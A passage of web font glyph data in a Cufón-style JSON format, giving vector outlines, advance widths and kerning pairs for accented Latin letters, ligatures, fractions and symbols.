00c6":{"d":"-3,0r184,-266r143,0r0,37r-96,0r0,76r95,0r0,37r-95,0r0,79r96,0r0,37r-138,0r0,-67r-93,0r-45,67r-51,0xm112,-100r74,0r0,-110","w":345},"\u00aa":{"d":"130,-268r0,111r-24,0r0,-20v-25,48,-96,14,-96,-36v0,-54,72,-80,96,-35r0,-20r24,0xm106,-213v0,-22,-15,-35,-36,-35v-20,0,-36,15,-36,36v0,14,12,35,36,35v22,-1,36,-14,36,-36","w":147},"\u0141":{"d":"1,-77r0,-43r26,-19r0,-127r43,0r0,97r47,-34r0,43r-47,34r0,89r94,0r0,37r-137,0r0,-96","w":164,"k":{"y":13,"\u00fd":13,"\u00ff":13,"O":18,"\u00d8":18,"\u0152":18,"\u00d3":18,"\u00d4":18,"\u00d6":18,"\u00d2":18,"\u00d5":18,"T":22,"V":36,"W":19,"Y":33,"\u00dd":33,"\u0178":33,"o":10,"\u00f8":10,"\u0153":10,"\u00f3":10,"\u00f4":10,"\u00f6":10,"\u00f2":10,"\u00f5":10}},"\u00d8":{"d":"222,-254r18,-24r42,0r-33,44v21,19,44,53,44,101v0,102,-118,171,-207,121r-18,24r-42,0r32,-44v-22,-19,-44,-53,-44,-101v0,-104,111,-171,208,-121xm83,-65r115,-157v-65,-37,-142,20,-142,88v0,28,11,53,27,69xm224,-201r-115,157v92,52,191,-77,115,-157","w":306,"k":{"T":15,"V":17,"W":6,"Y":18,"\u00dd":18,"\u0178":18,",":14,".":14,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17,"X":17}},"\u0152":{"d":"289,-229r0,76r95,0r0,37r-95,0r0,79r97,0r0,37r-138,0r0,-47v-65,103,-234,38,-234,-86v0,-75,56,-138,138,-138v50,0,82,23,96,51r0,-46r138,0r0,37r-97,0xm152,-234v-58,0,-96,47,-96,102v0,50,37,100,96,100v59,0,96,-48,96,-102v0,-55,-39,-100,-96,-100","w":405,"k":{"T":15,"V":17,"W":6,"Y":18,"\u00dd":18,"\u0178":18,",":14,".":14,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17,"X":17}},"\u00ba":{"d":"14,-212v0,-30,22,-59,59,-59v38,0,60,29,60,58v0,31,-25,59,-60,59v-36,0,-59,-29,-59,-58xm39,-212v0,19,15,35,34,35v18,0,35,-15,35,-36v0,-20,-15,-35,-34,-35v-19,0,-35,14,-35,36","w":147},"\u00e6":{"d":"389,-87r-166,0v12,81,97,71,122,28r39,0v-17,64,-132,94,-163,22r0,37r-35,0r0,-37v-11,25,-40,43,-72,43v-69,0,-101,-60,-101,-104v0,-95,133,-143,173,-62r0,-36r35,0r0,35v24,-53,103,-51,139,-11v17,20,32,49,29,85xm186,-98v0,-38,-29,-69,-68,-69v-44,0,-67,36,-67,69v0,40,30,69,69,69v37,0,66,-32,66,-69xm224,-113r128,0v-10,-81,-122,-68,-128,0","w":402},"\u0131":{"d":"24,0r0,-196r38,0r0,196r-38,0","w":86},"\u0142":{"d":"32,-107r-24,18r0,-40r24,-16r0,-121r38,0r0,97r29,-20r0,39r-29,20r0,130r-38,0r0,-107","w":103},"\u00f8":{"d":"180,-208r38,0r-26,36v60,59,25,180,-74,178v-22,0,-38,-6,-49,-12r-13,18r-38,0r26,-35v-60,-57,-27,-182,74,-179v22,0,40,6,49,12xm68,-54r77,-105v-61,-35,-126,54,-77,105xm168,-141r-77,105v62,34,126,-55,77,-105","w":235,"k":{"v":10,"w":8,"y":9,"\u00fd":9,"\u00ff":9,",":8,".":9,"x":11}},"\u0153":{"d":"381,-59v-9,27,-51,65,-95,65v-47,0,-74,-28,-84,-51v-14,29,-43,51,-85,51v-68,0,-104,-57,-104,-104v0,-56,42,-104,105,-104v38,0,70,22,84,50v10,-20,37,-49,83,-49v61,-1,109,56,102,114r-167,0v1,68,97,81,122,28r39,0xm51,-98v0,38,29,69,67,69v87,-1,86,-137,0,-138v-36,0,-67,28,-67,69xm222,-113r127,0v-3,-26,-26,-56,-64,-56v-32,0,-59,23,-63,56","w":400,"k":{"v":10,"w":8,"y":9,"\u00fd":9,"\u00ff":9,",":8,".":9,"x":11}},"\u00df":{"d":"24,-161v-6,-76,34,-106,87,-111v78,-7,103,100,46,128v92,18,65,150,-28,150v-33,0,-59,-17,-68,-47r0,41r-37,0r0,-161xm107,-237v-68,2,-41,99,-46,165r23,0v2,61,93,51,93,-2v0,-31,-29,-53,-79,-47r0,-29v31,3,54,-14,54,-43v0,-28,-19,-44,-45,-44","w":227,"k":{"w":6,",":2,".":3}},"\u00b9":{"d":"85,-266r0,159r-28,0r0,-134r-31,0r0,-25r59,0","w":137},"\u00ac":{"d":"17,-147r182,0r0,103r-37,0r0,-67r-145,0r0,-36","w":216},"\u00b5":{"d":"108,-29v66,0,46,-99,49,-167r37,0r0,196r-36,0r0,-33v-5,11,-17,37,-50,37v-29,0,-42,-15,-48,-25r0,88r-37,0r0,-263r37,0v2,70,-17,167,48,167","w":216},"\u00d0":{"d":"26,-154r0,-112v84,3,142,-16,191,43v66,81,22,232,-102,223r-89,0r0,-117r-26,0r0,-37r26,0xm204,-133v0,-74,-51,-105,-136,-96r0,75r62,0r0,37r-62,0r0,80v84,9,136,-23,136,-96","w":260,"k":{"V":13,"W":5,"Y":19,"\u00dd":19,"\u0178":19,",":22,".":20,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17}},"\u00bd":{"d":"76,-266r0,159r-28,0r0,-134r-31,0r0,-25r59,0xm207,-266r-115,266r-32,0r115,-266r32,0xm176,-104v-5,-33,29,-63,56,-59v60,-4,67,61,32,95r-45,43r68,0r0,25r-111,0r0,-23v23,-26,78,-51,78,-89v0,-14,-7,-26,-24,-26v-18,0,-25,16,-25,34r-29,0","w":303},"\u00b1":{"d":"90,-133r0,-59r36,0r0,59r73,0r0,36r-73,0r0,58r-36,0r0,-58r-73,0r0,-36r73,0xm17,16r0,-36r182,0r0,36r-182,0","w":216},"\u00de":{"d":"204,-139v0,71,-53,92,-137,85r0,54r-43,0r0,-266r43,0r0,44v85,-6,136,15,137,83xm164,-138v-1,-48,-47,-49,-97,-47r0,94v50,1,97,2,97,-47","w":208},"\u00bc":{"d":"207,-266r-115,266r-32,0r115,-266r32,0xm229,-123r-46,71r46,0r0,-71xm76,-266r0,159r-28,0r0,-134r-31,0r0,-25r59,0xm258,-160r0,108r17,0r0,23r-17,0r0,29r-29,0r0,-29r-78,0r0,-20r78,-111r29,0","w":291},"\u00f7":{"d":"126,-193r0,45r-36,0r0,-45r36,0xm18,-72r0,-37r180,0r0,37r-180,0xm126,-33r0,44r-36,0r0,-44r36,0","w":216},"\u00a6":{"d":"80,-243r41,0r0,126r-41,0r0,-126xm80,-63r41,0r0,126r-41,0r0,-126","w":199},"\u00b0":{"d":"123,-204v0,28,-22,51,-51,51v-29,0,-51,-22,-51,-51v0,-29,22,-52,51,-52v29,0,51,23,51,52xm42,-204v0,17,13,30,30,30v17,0,30,-13,30,-30v0,-17,-13,-31,-30,-31v-17,0,-30,14,-30,31","w":144},"\u00fe":{"d":"24,71r0,-337r38,0r0,103v15,-27,45,-39,73,-39v65,0,100,54,100,105v0,58,-42,103,-99,103v-39,0,-63,-20,-74,-38r0,103r-38,0xm60,-97v1,36,29,68,69,68v41,0,68,-32,68,-69v0,-36,-26,-68,-68,-68v-39,-1,-69,31,-69,69","w":248,"k":{"v":7,"y":7,"\u00fd":7,"\u00ff":7,",":10,".":10}},"\u00be":{"d":"268,-124r-48,72r48,0r0,-72xm247,-266r-115,266r-32,0r115,-266r32,0xm297,-160r0,108r17,0r0,23r-17,0r0,29r-29,0r0,-29r-78,0r0,-20r78,-111r29,0xm15,-156r30,0v1,17,13,27,28,27v17,0,27,-12,27,-27v0,-16,-19,-29,-44,-25r0,-22v20,2,36,-8,35,-21v0,-10,-5,-20,-18,-20v-15,0,-21,10,-21,20r-29,0v4,-67,97,-55,98,-4v0,13,-8,26,-21,33v52,18,29,92,-28,92v-30,0,-58,-23,-57,-53","w":328},"\u00b2":{"d":"13,-211v-4,-33,29,-59,56,-59v60,0,65,61,31,95r-44,43r68,0r0,25r-111,0r0,-23v23,-27,70,-53,78,-89v0,-14,-7,-25,-24,-25v-18,0,-25,15,-25,33r-29,0","w":137},"\u00ae":{"d":"145,-271v77,0,137,63,137,138v0,77,-62,138,-138,138v-77,0,-138,-61,-138,-138v0,-75,60,-138,139,-138xm144,-252v-67,0,-117,55,-117,119v0,66,52,118,117,118v64,0,117,-51,117,-118v0,-64,-50,-119,-117,-119xm183,-55v-10,-24,11,-71,-41,-66r-31,0r0,66r-26,0r0,-157v55,3,121,-16,121,44v0,14,-5,28,-27,37v16,5,23,15,24,36v2,29,2,33,5,40r-25,0xm181,-167v-6,-39,-38,-22,-70,-26r0,54v33,-3,62,12,70,-28","w":288},"\u00f0":{"d":"165,-177v-11,-18,-30,-35,-48,-45r-82,23r0,-26r54,-15v-14,-7,-29,-12,-46,-18r39,-12v15,5,29,12,46,21r74,-21r0,26r-46,13v36,22,66,68,66,126v0,67,-46,110,-104,110v-56,0,-105,-39,-105,-103v0,-88,94,-132,152,-79xm51,-98v0,37,25,68,67,68v42,0,67,-33,67,-68v0,-35,-27,-69,-66,-69v-43,0,-68,33,-68,69","w":235},"\u00d7":{"d":"45,0r-26,-26r63,-63r-63,-62r26,-26r63,63r63,-63r26,26r-63,62r63,63r-26,26r-63,-63","w":216},"\u00b3":{"d":"10,-156r30,0v1,17,13,27,28,27v17,0,27,-12,27,-27v0,-16,-19,-29,-44,-25r0,-22v20,2,37,-8,36,-21v0,-10,-6,-20,-19,-20v-14,0,-20,10,-21,20r-29,0v4,-67,98,-55,98,-4v0,13,-8,26,-21,33v53,18,30,92,-28,92v-29,0,-59,-22,-57,-53","w":137},"\u00a9":{"d":"145,-271v77,0,137,63,137,138v0,77,-62,138,-138,138v-77,0,-138,-61,-138,-138v0,-75,60,-138,139,-138xm144,-252v-67,0,-117,55,-117,119v0,66,52,118,117,118v64,0,117,-51,117,-118v0,-64,-50,-119,-117,-119xm215,-159r-25,0v-17,-62,-95,-32,-95,25v0,38,23,59,51,59v7,0,40,-1,46,-43r25,0v-3,41,-33,65,-72,65v-43,0,-76,-30,-76,-81v0,-45,28,-81,77,-81v40,0,66,27,69,56","w":288},"\u00c1":{"d":"73,-63r-24,63r-46,0r109,-266r39,0r107,266r-46,0r-25,-63r-114,0xm176,-97r-46,-120r-45,120r91,0xm87,-301r87,-48r12,27r-87,44","w":261,"k":{"v":19,"w":14,"y":17,"\u00fd":17,"\u00ff":17,"C":17,"\u00c7":17,"G":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"Q":17,"T":26,"u":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u00f9":13,"U":13,"\u00da":13,"\u00db":13,"\u00dc":13,"\u00d9":13,"V":37,"W":19,"Y":35,"\u00dd":35,"\u0178":35}},"\u00c2":{"d":"73,-63r-24,63r-46,0r109,-266r39,0r107,266r-46,0r-25,-63r-114,0xm176,-97r-46,-120r-45,120r91,0xm144,-337r61,52r-39,0r-35,-26r-36,26r-39,0r62,-52r26,0","w":261,"k":{"v":19,"w":14,"y":17,"\u00fd":17,"\u00ff":17,"C":17,"\u00c7":17,"G":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"Q":17,"T":26,"u":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u00f9":13,"U":13,"\u00da":13,"\u00db":13,"\u00dc":13,"\u00d9":13,"V":37,"W":19,"Y":35,"\u00dd":35,"\u0178":35}},"\u00c4":{"d":"73,-63r-24,63r-46,0r109,-266r39,0r107,266r-46,0r-25,-63r-114,0xm176,-97r-46,-120r-45,120r91,0xm112,-334r0,49r-36,0r0,-49r36,0xm185,-334r0,49r-36,0r0,-49r36,0","w":261,"k":{"v":19,"w":14,"y":17,"\u00fd":17,"\u00ff":17,"C":17,"\u00c7":17,"G":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"Q":17,"T":26,"u":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u00f9":13,"U":13,"\u00da":13,"\u00db":13,"\u00dc":13,"\u00d9":13,"V":37,"W":19,"Y":35,"\u00dd":35,"\u0178":35}},"\u00c0":{"d":"73,-63r-24,63r-46,0r109,-266r39,0r107,266r-46,0r-25,-63r-114,0xm176,-97r-46,-120r-45,120r91,0xm88,-347r86,47r-11,24r-88,-44","w":261,"k":{"v":19,"w":14,"y":17,"\u00fd":17,"\u00ff":17,"C":17,"\u00c7":17,"G":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"Q":17,"T":26,"u":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u00f9":13,"U":13,"\u00da":13,"\u00db":13,"\u00dc":13,"\u00d9":13,"V":37,"W":19,"Y":35,"\u00dd":35,"\u0178":35}},"\u00c5":{"d":"73,-63r-24,63r-46,0r109,-266r39,0r107,266r-46,0r-25,-63r-114,0xm176,-97r-46,-120r-45,120r91,0xm131,-354v22,0,40,18,40,40v0,22,-18,39,-40,39v-22,0,-40,-17,-40,-39v0,-22,18,-40,40,-40xm150,-315v0,-10,-8,-19,-20,-19v-10,0,-18,9,-18,19v0,10,9,19,19,19v10,0,19,-9,19,-19","w":261,"k":{"v":19,"w":14,"y":17,"\u00fd":17,"\u00ff":17,"C":17,"\u00c7":17,"G":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"Q":17,"T":26,"u":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u00f9":13,"U":13,"\u00da":13,"\u00db":13,"\u00dc":13,"\u00d9":13,"V":37,"W":19,"Y":35,"\u00dd":35,"\u0178":35}},"\u00c3":{"d":"73,-63r-24,63r-46,0r109,-266r39,0r107,266r-46,0r-25,-63r-114,0xm176,-97r-46,-120r-45,120r91,0xm61,-319v31,-35,91,15,125,-12r15,25v-32,36,-91,-15,-126,12","w":261,"k":{"v":19,"w":14,"y":17,"\u00fd":17,"\u00ff":17,"C":17,"\u00c7":17,"G":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"Q":17,"T":26,"u":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u00f9":13,"U":13,"\u00da":13,"\u00db":13,"\u00dc":13,"\u00d9":13,"V":37,"W":19,"Y":35,"\u00dd":35,"\u0178":35}},"\u00c7":{"d":"156,5r-8,15v18,-5,35,8,36,28v0,32,-55,55,-68,5r19,0v5,17,29,13,29,-5v1,-15,-20,-18,-26,-7r-17,-8r15,-29v-71,-8,-122,-68,-122,-138v0,-73,57,-137,139,-137v72,0,114,50,127,87r-45,0v-9,-17,-35,-50,-82,-50v-57,0,-96,46,-96,100v0,55,40,102,96,102v51,0,76,-39,82,-49r45,0v-16,47,-64,85,-124,86","w":291,"k":{",":3,".":3,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18}},"\u00c9":{"d":"26,0r0,-266r149,0r0,37r-107,0r0,76r105,0r0,37r-105,0r0,79r107,0r0,37r-149,0xm53,-306r86,-48r12,27r-87,44","w":193},"\u00ca":{"d":"26,0r0,-266r149,0r0,37r-107,0r0,76r105,0r0,37r-105,0r0,79r107,0r0,37r-149,0xm110,-341r61,52r-39,0r-35,-27r-36,27r-39,0r62,-52r26,0","w":193},"\u00cb":{"d":"26,0r0,-266r149,0r0,37r-107,0r0,76r105,0r0,37r-105,0r0,79r107,0r0,37r-149,0xm78,-339r0,49r-36,0r0,-49r36,0xm151,-339r0,49r-36,0r0,-49r36,0","w":193},"\u00c8":{"d":"26,0r0,-266r149,0r0,37r-107,0r0,76r105,0r0,37r-105,0r0,79r107,0r0,37r-149,0xm54,-352r87,47r-11,23r-88,-43","w":193},"\u00cd":{"d":"26,0r0,-266r42,0r0,266r-42,0xm11,-305r86,-48r13,27r-87,44","w":93},"\u00ce":{"d":"26,0r0,-266r42,0r0,266r-42,0xm60,-340r62,52r-40,0r-35,-27r-35,27r-40,0r63,-52r25,0","w":93},"\u00cf":{"d":"26,0r0,-266r42,0r0,266r-42,0xm28,-338r0,49r-36,0r0,-49r36,0xm102,-338r0,49r-37,0r0,-49r37,0","w":93},"\u00cc":{"d":"26,0r0,-266r42,0r0,266r-42,0xm-3,-351r86,48r-11,23r-88,-44","w":93},"\u00d1":{"d":"66,-266r138,202r-1,-202r41,0r0,266r-39,0r-139,-203r1,203r-41,0r0,-266r40,0xm65,-319v32,-33,92,15,125,-11r15,25v-33,35,-93,-16,-125,12","w":270},"\u00d3":{"d":"153,5v-80,0,-139,-63,-139,-137v0,-84,64,-139,139,-139v80,0,140,61,140,138v0,77,-60,138,-140,138xm153,-234v-58,0,-97,46,-97,101v0,55,41,101,98,101v58,0,96,-49,96,-101v0,-52,-39,-101,-97,-101xm109,-306r86,-48r13,27r-87,44","w":306,"k":{"T":15,"V":17,"W":6,"Y":18,"\u00dd":18,"\u0178":18,",":14,".":14,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17,"X":17}},"\u00d4":{"d":"153,5v-80,0,-139,-63,-139,-137v0,-84,64,-139,139,-139v80,0,140,61,140,138v0,77,-60,138,-140,138xm153,-234v-58,0,-97,46,-97,101v0,55,41,101,98,101v58,0,96,-49,96,-101v0,-52,-39,-101,-97,-101xm167,-341r61,52r-39,0r-36,-26r-35,26r-40,0r63,-52r26,0","w":306,"k":{"T":15,"V":17,"W":6,"Y":18,"\u00dd":18,"\u0178":18,",":14,".":14,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17,"X":17}},"\u00d6":{"d":"153,5v-80,0,-139,-63,-139,-137v0,-84,64,-139,139,-139v80,0,140,61,140,138v0,77,-60,138,-140,138xm153,-234v-58,0,-97,46,-97,101v0,55,41,101,98,101v58,0,96,-49,96,-101v0,-52,-39,-101,-97,-101xm135,-339r0,49r-37,0r0,-49r37,0xm208,-339r0,49r-37,0r0,-49r37,0","w":306,"k":{"T":15,"V":17,"W":6,"Y":18,"\u00dd":18,"\u0178":18,",":14,".":14,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17,"X":17}},"\u00d2":{"d":"153,5v-80,0,-139,-63,-139,-137v0,-84,64,-139,139,-139v80,0,140,61,140,138v0,77,-60,138,-140,138xm153,-234v-58,0,-97,46,-97,101v0,55,41,101,98,101v58,0,96,-49,96,-101v0,-52,-39,-101,-97,-101xm111,-352r86,47r-11,23r-87,-43","w":306,"k":{"T":15,"V":17,"W":6,"Y":18,"\u00dd":18,"\u0178":18,",":14,".":14,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17,"X":17}},"\u00d5":{"d":"153,5v-80,0,-139,-63,-139,-137v0,-84,64,-139,139,-139v80,0,140,61,140,138v0,77,-60,138,-140,138xm153,-234v-58,0,-97,46,-97,101v0,55,41,101,98,101v58,0,96,-49,96,-101v0,-52,-39,-101,-97,-101xm84,-319v32,-33,91,15,125,-11r14,25v-33,35,-92,-16,-125,12","w":306,"k":{"T":15,"V":17,"W":6,"Y":18,"\u00dd":18,"\u0178":18,",":14,".":14,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17,"X":17}},"\u0160":{"d":"144,-73v0,-67,-127,-30,-127,-122v0,-95,156,-109,164,-3r-42,0v-3,-14,-9,-37,-40,-37v-22,0,-40,14,-40,37v0,26,20,31,63,48v33,13,64,31,64,74v0,43,-29,81,-86,81v-53,0,-87,-33,-88,-84r42,0v3,40,31,48,45,48v24,0,45,-18,45,-42xm24,-338r39,0r36,27r35,-27r39,0r-61,52r-27,0","w":197,"k":{",":3,".":6}},"\u00da":{"d":"119,5v-51,3,-94,-49,-94,-105r0,-166r43,0r0,166v-4,35,15,68,50,68v36,0,51,-33,51,-68r0,-166r42,0r0,166v3,62,-33,102,-92,105xm81,-303r86,-48r13,27r-87,44","w":236,"k":{",":10,".":10,"A":13,"\u00c6":13,"\u00c1":13,"\u00c2":13,"\u00c4":13,"\u00c0":13,"\u00c5":13,"\u00c3":13}},"\u00db":{"d":"119,5v-51,3,-94,-49,-94,-105r0,-166r43,0r0,166v-4,35,15,68,50,68v36,0,51,-33,51,-68r0,-166r42,0r0,166v3,62,-33,102,-92,105xm132,-339r61,52r-39,0r-36,-27r-35,27r-39,0r62,-52r26,0","w":236,"k":{",":10,".":10,"A":13,"\u00c6":13,"\u00c1":13,"\u00c2":13,"\u00c4":13,"\u00c0":13,"\u00c5":13,"\u00c3":13}},"\u00dc":{"d":"119,5v-51,3,-94,-49,-94,-105r0,-166r43,0r0,166v-4,35,15,68,50,68v36,0,51,-33,51,-68r0,-166r42,0r0,166v3,62,-33,102,-92,105xm100,-337r0,49r-37,0r0,-49r37,0xm173,-337r0,49r-37,0r0,-49r37,0","w":236,"k":{",":10,".":10,"A":13,"\u00c6":13,"\u00c1":13,"\u00c2":13,"\u00c4":13,"\u00c0":13,"\u00c5":13,"\u00c3":13}},"\u00d9":{"d":"119,5v-51,3,-94,-49,-94,-105r0,-166r43,0r0,166v-4,35,15,68,50,68v36,0,51,-33,51,-68r0,-166r42,0r0,166v3,62,-33,102,-92,105xm64,-350r86,48r-11,23r-87,-44","w":236,"k":{",":10,".":10,"A":13,"\u00c6":13,"\u00c1":13,"\u00c2":13,"\u00c4":13,"\u00c0":13,"\u00c5":13,"\u00c3":13}},"\u00dd":{"d":"88,0r0,-95r-84,-171r46,0r59,131r59,-131r46,0r-84,171r0,95r-42,0xm77,-303r86,-48r12,27r-87,44","w":217,"k":{"v":15,"O":18,"\u00d8":18,"\u0152":18,"\u00d3":18,"\u00d4":18,"\u00d6":18,"\u00d2":18,"\u00d5":18,"u":27,"\u00fa":27,"\u00fb":27,"\u00fc":27,"\u00f9":27,",":49,".":49,"A":35,"\u00c6":35,"\u00c1":35,"\u00c2":35,"\u00c4":35,"\u00c0":35,"\u00c5":35,"\u00c3":35,"a":37,"\u00e6":37,"\u00e1":37,"\u00e2":37,"\u00e4":37,"\u00e0":37,"\u00e5":37,"\u00e3":37,"e":37,"\u00e9":37,"\u00ea":37,"\u00eb":37,"\u00e8":37,"i":8,"\u00ed":8,"\u00ee":8,"\u00ef":8,"\u00ec":8,"o":37,"\u00f8":37,"\u0153":37,"\u00f3":37,"\u00f4":37,"\u00f6":37,"\u00f2":37,"\u00f5":37,"p":23,"q":37,"-":39,":":17,";":20,"S":12,"\u0160":12}},"\u0178":{"d":"88,0r0,-95r-84,-171r46,0r59,131r59,-131r46,0r-84,171r0,95r-42,0xm90,-337r0,49r-36,0r0,-49r36,0xm163,-337r0,49r-36,0r0,-49r36,0","w":217,"k":{"v":15,"O":18,"\u00d8":18,"\u0152":18,"\u00d3":18,"\u00d4":18,"\u00d6":18,"\u00d2":18,"\u00d5":18,"u":27,"\u00fa":27,"\u00fb":27,"\u00fc":27,"\u00f9":27,",":49,".":49,"A":35,"\u00c6":35,"\u00c1":35,"\u00c2":35,"\u00c4":35,"\u00c0":35,"\u00c5":35,"\u00c3":35,"a":37,"\u00e6":37,"\u00e1":37,"\u00e2":37,"\u00e4":37,"\u00e0":37,"\u00e5":37,"\u00e3":37,"e":37,"\u00e9":37,"\u00ea":37,"\u00eb":37,"\u00e8":37,"i":8,"\u00ed":8,"\u00ee":8,"\u00ef":8,"\u00ec":8,"o":37,"\u00f8":37,"\u0153":37,"\u00f3":37,"\u00f4":37,"\u00f6":37,"\u00f2":37,"\u00f5":37,"p":23,"q":37,"-":39,":":17,";":20,"S":12,"\u0160":12}},"\u017d":{"d":"172,-233r-114,196r117,0r0,37r-169,0r0,-27r118,-202r-120,0r0,-37r168,0r0,33xm14,-336r40,0r35,27r36,-27r39,0r-62,52r-26,0","w":179},"\u00e1":{"d":"224,-196r0,196r-38,0r0,-34v-14,26,-41,40,-72,40v-63,0,-101,-49,-101,-104v0,-60,44,-104,101,-104v39,0,63,22,72,41r0,-35r38,0xm187,-97v0,-41,-27,-70,-69,-70v-41,0,-67,32,-67,70v0,29,20,68,68,68v41,-1,68,-29,68,-68xm80,-242r86,-48r12,28r-87,43","w":248},"\u00e2":{"d":"224,-196r0,196r-38,0r0,-34v-14,26,-41,40,-72,40v-63,0,-101,-49,-101,-104v0,-60,44,-104,101,-104v39,0,63,22,72,41r0,-35r38,0xm187,-97v0,-41,-27,-70,-69,-70v-41,0,-67,32,-67,70v0,29,20,68,68,68v41,-1,68,-29,68,-68xm135,-277r61,52r-39,0r-35,-27r-36,27r-39,0r62,-52r26,0","w":248},"\u00e4":{"d":"224,-196r0,196r-38,0r0,-34v-14,26,-41,40,-72,40v-63,0,-101,-49,-101,-104v0,-60,44,-104,101,-104v39,0,63,22,72,41r0,-35r38,0xm187,-97v0,-41,-27,-70,-69,-70v-41,0,-67,32,-67,70v0,29,20,68,68,68v41,-1,68,-29,68,-68xm102,-275r0,49r-37,0r0,-49r37,0xm175,-275r0,49r-37,0r0,-49r37,0","w":248},"\u00e0":{"d":"224,-196r0,196r-38,0r0,-34v-14,26,-41,40,-72,40v-63,0,-101,-49,-101,-104v0,-60,44,-104,101,-104v39,0,63,22,72,41r0,-35r38,0xm187,-97v0,-41,-27,-70,-69,-70v-41,0,-67,32,-67,70v0,29,20,68,68,68v41,-1,68,-29,68,-68xm79,-288r87,48r-12,23r-87,-44","w":248},"\u00e5":{"d":"224,-196r0,196r-38,0r0,-34v-14,26,-41,40,-72,40v-63,0,-101,-49,-101,-104v0,-60,44,-104,101,-104v39,0,63,22,72,41r0,-35r38,0xm187,-97v0,-41,-27,-70,-69,-70v-41,0,-67,32,-67,70v0,29,20,68,68,68v41,-1,68,-29,68,-68xm119,-292v22,0,40,18,40,40v0,22,-18,39,-40,39v-22,0,-40,-17,-40,-39v0,-22,18,-40,40,-40xm138,-253v0,-10,-8,-19,-20,-19v-10,0,-18,9,-18,19v0,10,9,19,19,19v10,0,19,-9,19,-19","w":248},"\u00e3":{"d":"224,-196r0,196r-38,0r0,-34v-14,26,-41,40,-72,40v-63,0,-101,-49,-101,-104v0,-60,44,-104,101,-104v39,0,63,22,72,41r0,-35r38,0xm187,-97v0,-41,-27,-70,-69,-70v-41,0,-67,32,-67,70v0,29,20,68,68,68v41,-1,68,-29,68,-68xm53,-255v31,-36,92,17,125,-12r14,25v-32,36,-92,-16,-125,13","w":248},"\u00e7":{"d":"118,-166v-38,-1,-67,29,-67,68v0,40,30,69,67,69v33,0,53,-21,61,-40r38,0v-12,41,-47,72,-96,74r-8,15v18,-5,35,8,36,28v0,32,-55,55,-68,5r19,0v5,17,29,13,29,-5v1,-15,-20,-18,-26,-7r-17,-8r14,-29v-50,-8,-87,-48,-87,-102v0,-58,44,-104,103,-104v47,0,89,29,101,76r-38,0v-10,-26,-34,-40,-61,-40","w":229,"k":{"y":3,"\u00fd":3,"\u00ff":3,",":3,"h":3,"k":3,"l":3,"\u0142":3}},"\u00e9":{"d":"210,-59v-15,38,-50,65,-96,65v-64,0,-103,-52,-103,-104v0,-88,115,-138,175,-75v23,23,33,54,30,87r-167,0v3,69,97,79,122,27r39,0xm49,-115r130,0v-2,-26,-28,-55,-65,-55v-38,0,-63,28,-65,55xm69,-242r86,-48r13,28r-87,43","w":228,"k":{"v":9,"w":6,"y":8,"\u00fd":8,"\u00ff":8,",":3,".":4,"x":8}},"\u00ea":{"d":"210,-59v-15,38,-50,65,-96,65v-64,0,-103,-52,-103,-104v0,-88,115,-138,175,-75v23,23,33,54,30,87r-167,0v3,69,97,79,122,27r39,0xm49,-115r130,0v-2,-26,-28,-55,-65,-55v-38,0,-63,28,-65,55xm127,-277r62,52r-39,0r-36,-27r-35,27r-39,0r62,-52r25,0","w":228,"k":{"v":9,"w":6,"y":8,"\u00fd":8,"\u00ff":8,",":3,".":4,"x":8}},"\u00eb":{"d":"210,-59v-15,38,-50,65,-96,65v-64,0,-103,-52,-103,-104v0,-88,115,-138,175,-75v23,23,33,54,30,87r-167,0v3,69,97,79,122,27r39,0xm49,-115r130,0v-2,-26,-28,-55,-65,-55v-38,0,-63,28,-65,55xm95,-275r0,49r-36,0r0,-49r36,0xm168,-275r0,49r-36,0r0,-49r36,0","w":228,"k":{"v":9,"w":6,"y":8,"\u00fd":8,"\u00ff":8,",":3,".":4,"x":8}},"\u00e8":{"d":"210,-59v-15,38,-50,65,-96,65v-64,0,-103,-52,-103,-104v0,-88,115,-138,175,-75v23,23,33,54,30,87r-167,0v3,69,97,79,122,27r39,0xm49,-115r130,0v-2,-26,-28,-55,-65,-55v-38,0,-63,28,-65,55xm72,-288r86,48r-11,23r-87,-44","w":228,"k":{"v":9,"w":6,"y":8,"\u00fd":8,"\u00ff":8,",":3,".":4,"x":8}},"\u00ed":{"d":"24,0r0,-196r38,0r0,196r-38,0xm6,-242r86,-48r13,28r-87,43","w":86},"\u00ee":{"d